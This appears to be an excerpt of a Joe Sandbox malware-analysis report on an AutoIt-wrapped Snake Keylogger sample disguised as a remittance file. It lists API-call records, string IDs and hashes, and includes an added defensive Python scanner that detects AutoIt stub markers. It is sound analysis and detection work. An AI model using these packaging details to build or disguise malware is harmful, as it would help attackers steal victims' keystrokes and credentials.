                                                                      • Opcode Fuzzy Hash: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                                                                      • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,00000104,?), ref: 00401F4C
                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                      • __wcsicoll.LIBCMT ref: 00402007
                                                                      • __wcsicoll.LIBCMT ref: 0040201D
                                                                      • __wcsicoll.LIBCMT ref: 00402033
                                                                        • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                      • __wcsicoll.LIBCMT ref: 00402049
                                                                      • _wcscpy.LIBCMT ref: 0040207C
                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,00000104), ref: 00428B5B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe$CMDLINE$CMDLINERAW
                                                                      • API String ID: 3948761352-1155694392
                                                                      • Opcode ID: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                                      • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                      • Opcode Fuzzy Hash: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                                      • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
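The string IDs in the two function records above (the MessageBoxA text "This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.", the "AutoIt v3" window class passed to CreateWindowExW, and the /AutoIt3ExecuteLine, /AutoIt3ExecuteScript, /AutoIt3OutputDebug and /ErrorStdOut switches compared with __wcsicoll) belong to the AutoIt runtime stub that wraps this sample, not to the Snake Keylogger payload. The Python scanner below is an added triage example, not part of this report, of Joe Sandbox, or of AutoIt: it searches a file for those markers in both ANSI and UTF-16LE form (the stub passes the first to MessageBoxA and the others to wide-character APIs) and returns a coarse verdict. The marker list, the verdict labels, the classify() thresholds and the constructed sample buffers are assumptions of the example.

```python
"""Static triage: flag a binary carrying the AutoIt runtime stub markers.

Added example for this report; not Joe Sandbox, AutoIt or Snake Keylogger code.
"""
from __future__ import annotations

from pathlib import Path

# Markers copied from the report's string listings for the functions around
# 0042E1C9 (MessageBoxA text), 004105A5 (window class) and 00401F20 (switches).
AUTOIT_MARKERS = [
    "This is a compiled AutoIt script. AV researchers please email "
    "avsupport@autoitscript.com for support.",
    "AutoIt v3",
    "/AutoIt3ExecuteLine",
    "/AutoIt3ExecuteScript",
    "/AutoIt3OutputDebug",
    "/ErrorStdOut",
]

# Markers whose presence alone is treated as "AutoIt-compiled" (assumption:
# the stub text and the interpreter switches are specific to the runtime).
STRONG_MARKERS = {AUTOIT_MARKERS[0], "/AutoIt3ExecuteLine", "/AutoIt3ExecuteScript"}


def _encodings(marker: str) -> dict[str, bytes]:
    # The stub uses MessageBoxA (ANSI) for the first marker and ...W APIs
    # (UTF-16LE) for the rest, so look for every marker in both encodings.
    return {"ascii": marker.encode("ascii"), "utf-16le": marker.encode("utf-16-le")}


def find_autoit_markers(data: bytes) -> dict[str, list[str]]:
    """Return {marker: [encodings in which it was found]} for markers present in data."""
    hits: dict[str, list[str]] = {}
    for marker in AUTOIT_MARKERS:
        for enc_name, needle in _encodings(marker).items():
            if needle in data:
                hits.setdefault(marker, []).append(enc_name)
    return hits


def classify(data: bytes) -> str:
    """Coarse verdict: 'autoit-compiled', 'autoit-strings' (weak hits only) or 'none'."""
    hits = find_autoit_markers(data)
    if not hits:
        return "none"
    if STRONG_MARKERS & set(hits):
        return "autoit-compiled"
    return "autoit-strings"


def scan_file(path: str | Path) -> str:
    """Classify a file on disk (reads the whole file; fine for executables of this size)."""
    return classify(Path(path).read_bytes())


# Constructed sample inputs (not bytes taken from the real sample) so the
# scanner can be exercised offline.
SAMPLE_AUTOIT = (
    b"MZ\x90\x00" + b"\x00" * 64
    + AUTOIT_MARKERS[0].encode("ascii") + b"\x00"
    + "/AutoIt3ExecuteScript".encode("utf-16-le") + b"\x00\x00"
    + "AutoIt v3".encode("utf-16-le")
)
SAMPLE_CLEAN = b"MZ\x90\x00" + b"\x00" * 64 + b"Hello, world\x00"


if __name__ == "__main__":
    import sys

    for p in sys.argv[1:]:
        blob = Path(p).read_bytes()
        print(p, classify(blob), find_autoit_markers(blob))
```

A hit only establishes that the AutoIt interpreter stub is present; legitimate AutoIt programs carry the same strings, so treat the verdict as a reason to extract and inspect the embedded script rather than as a malware determination.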

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __fread_nolock$_fseek_wcscpy
                                                                      • String ID: D)E$D)E$FILE
                                                                      • API String ID: 3888824918-361185794
                                                                      • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                      • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                      • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                      • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                      • __wsplitpath.LIBCMT ref: 0040E41C
                                                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                      • _wcsncat.LIBCMT ref: 0040E433
                                                                      • __wmakepath.LIBCMT ref: 0040E44F
                                                                        • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                      • _wcscpy.LIBCMT ref: 0040E487
                                                                        • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                      • _wcscat.LIBCMT ref: 00427541
                                                                      • _wcslen.LIBCMT ref: 00427551
                                                                      • _wcslen.LIBCMT ref: 00427562
                                                                      • _wcscat.LIBCMT ref: 0042757C
                                                                      • _wcsncpy.LIBCMT ref: 004275BC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                      • String ID: Include$\
                                                                      • API String ID: 3173733714-3429789819
                                                                      • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                      • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                      • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                      • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • _fseek.LIBCMT ref: 0045292B
                                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                      • __fread_nolock.LIBCMT ref: 00452961
                                                                      • __fread_nolock.LIBCMT ref: 00452971
                                                                      • __fread_nolock.LIBCMT ref: 0045298A
                                                                      • __fread_nolock.LIBCMT ref: 004529A5
                                                                      • _fseek.LIBCMT ref: 004529BF
                                                                      • _malloc.LIBCMT ref: 004529CA
                                                                      • _malloc.LIBCMT ref: 004529D6
                                                                      • __fread_nolock.LIBCMT ref: 004529E7
                                                                      • _free.LIBCMT ref: 00452A17
                                                                      • _free.LIBCMT ref: 00452A20
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                      • String ID:
                                                                      • API String ID: 1255752989-0
                                                                      • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                      • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                      • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                      • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                      • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                      • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                      • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                      • ImageList_ReplaceIcon.COMCTL32(00AB18C0,000000FF,00000000), ref: 00410552
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                      • API String ID: 2914291525-1005189915
                                                                      • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                      • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                      • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                      • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                      • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                      • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                      • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                      • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                      • RegisterClassExW.USER32(?), ref: 0041045D
                                                                        • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                        • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                        • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                        • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                        • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                        • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                        • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00AB18C0,000000FF,00000000), ref: 00410552
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                      • String ID: #$0$AutoIt v3
                                                                      • API String ID: 423443420-4155596026
                                                                      • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                      • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                      • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                      • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _malloc
                                                                      • String ID: Default
                                                                      • API String ID: 1579825452-753088835
                                                                      • Opcode ID: 443df2c3c68efbd16d3948df002b7be0acb455de1234585f427717e2e3840c69
                                                                      • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                      • Opcode Fuzzy Hash: 443df2c3c68efbd16d3948df002b7be0acb455de1234585f427717e2e3840c69
                                                                      • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __fread_nolock_fseek_memmove_strcat
                                                                      • String ID: AU3!$EA06
                                                                      • API String ID: 1268643489-2658333250
                                                                      • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                      • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                      • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                      • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                      • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                      • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                      • CreatePopupMenu.USER32 ref: 00401204
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                      • String ID: TaskbarCreated
                                                                      • API String ID: 129472671-2362178303
                                                                      • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                      • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                      • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                      • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                                      Control-flow Graph (image not reproduced; basic blocks 4115d7-411656, internal subcalls only)
                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 004115F1
                                                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                      • std::exception::exception.LIBCMT ref: 00411626
                                                                      • std::exception::exception.LIBCMT ref: 00411640
                                                                      • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                      • String ID: ,*H$4*H$@fI
                                                                      • API String ID: 615853336-1459471987
                                                                      • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                      • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                      • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                      • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                                      Control-flow Graph (image not reproduced; basic blocks 3ec2d90-3ec2f48, nodes call CreateFileW, VirtualAlloc, ReadFile, WriteFile, CloseHandle, VirtualFree)
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 03EC2DD5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2136384776.0000000003EC2000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC2000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3ec2000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                      • Instruction ID: e35dd090c76f83adb43321ccbeb93939382ba4eb521d996354c01e636bc19954
                                                                      • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                      • Instruction Fuzzy Hash: 5451FB75A50248FBDF24DFA4CD49FDE7778AF48700F108A58FB4AFA180DAB496458B60

                                                                      Control-flow Graph (image not reproduced; basic blocks 4102b0-410384 and 425dfd-425e0e, nodes call SHGetMalloc, SHGetDesktopFolder, SHGetPathFromIDListW)
                                                                      APIs
                                                                      • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                      • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                      • _wcsncpy.LIBCMT ref: 004102ED
                                                                      • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                      • _wcsncpy.LIBCMT ref: 00410340
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
